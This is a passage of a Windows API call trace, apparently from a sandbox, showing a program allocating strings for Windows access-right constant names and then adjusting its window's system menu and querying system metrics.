[0190.594] SysReAllocStringLen (in: pbstr=0x293e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293e620*="STANDARD_RIGHTS_WRITE") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293e610*="STANDARD_RIGHTS_READ") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293e600*="STANDARD_RIGHTS_ALL") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293e5f0*="DELETE") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293e5e0*="READ_CONTROL") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293e5d0*="WRITE_OWNER") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293e5c0*="WRITE_DAC") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x293e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x293e5a0*="THREAD_IMPERSONATE") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x293e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x293e580*="THREAD_QUERY_INFORMATION") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x293e570*="THREAD_SET_INFORMATION") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x293e560*="THREAD_SET_CONTEXT") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x293e550*="THREAD_GET_CONTEXT") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x293e540*="THREAD_SUSPEND_RESUME") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x293e530*="THREAD_TERMINATE") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x293e520*="THREAD_ALL_ACCESS") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293e500*="STANDARD_RIGHTS_WRITE") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293e4f0*="STANDARD_RIGHTS_READ") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293e4d0*="DELETE") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293e4c0*="READ_CONTROL") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293e4b0*="WRITE_OWNER") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293e4a0*="WRITE_DAC") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x293e490*="PROCESS_QUERY_INFORMATION") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x293e480*="PROCESS_SET_INFORMATION") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x293e470*="PROCESS_SET_QUOTA") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x293e460*="PROCESS_CREATE_PROCESS") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x293e450*="PROCESS_DUP_HANDLE") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x293e440*="PROCESS_VM_WRITE") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x293e430*="PROCESS_VM_READ") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x293e420*="PROCESS_VM_OPERATION") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x293e410*="PROCESS_SET_SESSIONID") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x293e400*="PROCESS_CREATE_THREAD") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x293e3f0*="PROCESS_TERMINATE") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x293e3e0*="PROCESS_ALL_ACCESS") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293e3b0*="STANDARD_RIGHTS_READ") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293e390*="DELETE") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293e380*="READ_CONTROL") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293e370*="WRITE_OWNER") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293e360*="WRITE_DAC") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x293e350*="PERM_FILE_CREATE") returned 1
[0190.595] SysReAllocStringLen (in: pbstr=0x293e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x293e340*="PERM_FILE_WRITE") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x293e330*="PERM_FILE_READ") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293e310*="STANDARD_RIGHTS_WRITE") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293e300*="STANDARD_RIGHTS_READ") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293e2e0*="DELETE") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293e2d0*="READ_CONTROL") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293e2c0*="WRITE_OWNER") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293e2b0*="WRITE_DAC") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x293e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x293e290*="PRINTER_ACCESS_USE") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x293e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x293e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x293e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x293e250*="PRINTER_ALL_ACCESS") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x293e240*="PRINTER_EXECUTE") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x293e230*="PRINTER_WRITE") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x293e220*="PRINTER_READ") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x293e210*="PRINTER_ALL_ACCESS") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293e200*="DELETE") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293e1f0*="READ_CONTROL") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293e1e0*="WRITE_OWNER") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293e1d0*="WRITE_DAC") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x293e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x293e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x293e1a0*="SC_MANAGER_LOCK") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x293e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x293e180*="SC_MANAGER_CONNECT") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x293e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x293e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0190.596] SysReAllocStringLen (in: pbstr=0x293e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293e140*="STANDARD_RIGHTS_WRITE") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293e130*="STANDARD_RIGHTS_READ") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293e120*="STANDARD_RIGHTS_ALL") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293e110*="DELETE") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293e100*="READ_CONTROL") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293e0f0*="WRITE_OWNER") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293e0e0*="WRITE_DAC") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x293e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x293e0c0*="SERVICE_STOP") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x293e0b0*="SERVICE_START") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x293e0a0*="SERVICE_QUERY_STATUS") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x293e090*="SERVICE_QUERY_CONFIG") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x293e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x293e070*="SERVICE_INTERROGATE") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x293e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x293e050*="SERVICE_CHANGE_CONFIG") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x293e040*="SERVICE_ALL_ACCESS") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293e020*="STANDARD_RIGHTS_WRITE") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293e010*="STANDARD_RIGHTS_READ") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293e000*="STANDARD_RIGHTS_ALL") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293dff0*="DELETE") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293dfe0*="READ_CONTROL") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293dfd0*="WRITE_OWNER") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293dfc0*="WRITE_DAC") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x293dfb0*="KEY_SET_VALUE") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x293dfa0*="KEY_CREATE_LINK") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x293df90*="KEY_CREATE_SUB_KEY") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x293df80*="KEY_NOTIFY") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x293df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x293df60*="KEY_QUERY_VALUE") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293df40*="STANDARD_RIGHTS_WRITE") returned 1
[0190.597] SysReAllocStringLen (in: pbstr=0x293df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x293df30*="STANDARD_RIGHTS_READ 2") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x293df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293df10*="DELETE") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293df00*="READ_CONTROL") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293def0*="WRITE_OWNER") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293dee0*="WRITE_DAC") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x293ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x293dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x293deb0*="DESKTOP_JOURNALRECORD") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x293dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x293de90*="DESKTOP_HOOKCONTROL") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x293de80*="DESKTOP_CREATEWINDOW") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x293de70*="DESKTOP_CREATEMENU") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x293de60*="DESKTOP_READOBJECTS") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x293de50*="DESKTOP_ENUMERATE") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293de30*="STANDARD_RIGHTS_WRITE") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293de20*="STANDARD_RIGHTS_READ") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293de10*="STANDARD_RIGHTS_ALL") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293de00*="DELETE") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293ddf0*="READ_CONTROL") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293dde0*="WRITE_OWNER") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293ddd0*="WRITE_DAC") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x293ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x293ddb0*="WINSTA_READSCREEN") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x293dda0*="WINSTA_READATTRIBUTES") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x293dd90*="WINSTA_EXITWINDOWS") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x293dd80*="WINSTA_ENUMERATE") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x293dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x293dd60*="WINSTA_CREATEDESKTOP") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x293dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x293dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293dd10*="STANDARD_RIGHTS_READ") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x293dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0190.598] SysReAllocStringLen (in: pbstr=0x293dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293dcf0*="READ_CONTROL") returned 1
[0190.599] SysReAllocStringLen (in: pbstr=0x293dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x293dce0*="SI_ACCESS_SPECIFIC") returned 1
[0190.599] SysReAllocStringLen (in: pbstr=0x293dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293dcd0*="WRITE_DAC") returned 1
[0190.599] SysReAllocStringLen (in: pbstr=0x293dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x293dcc0*="FILE_DELETE") returned 1
[0190.599] SysReAllocStringLen (in: pbstr=0x293dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x293dcb0*="FILE_DELETE_CHILD") returned 1
[0190.600] SetClassLongA (hWnd=0x1301e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0190.600] GetSystemMenu (hWnd=0x1301e8, bRevert=0) returned 0x12019d
[0190.600] DeleteMenu (hMenu=0x12019d, uPosition=0xf030, uFlags=0x0) returned 1
[0190.600] DeleteMenu (hMenu=0x12019d, uPosition=0xf000, uFlags=0x0) returned 1
[0190.600] DeleteMenu (hMenu=0x12019d, uPosition=0xf010, uFlags=0x0) returned 1
[0190.600] GetCurrentThreadId () returned 0x810
[0190.600] ResetEvent (hEvent=0xa0) returned 1
[0190.600] GetCurrentThreadId () returned 0x810
[0190.600] GetCurrentThreadId () returned 0x810
[0190.601] GetCurrentThreadId () returned 0x810
[0190.601] ResetEvent (hEvent=0xa0) returned 1
[0190.601] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8efa4, fWinIni=0x0 | out: pvParam=0x8efa4) returned 1
[0190.601] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8efa4, fWinIni=0x0 | out: pvParam=0x8efa4) returned 1
[0190.601] GetSystemMetrics (nIndex=49) returned 16
[0190.601] GetSystemMetrics (nIndex=50) returned 16
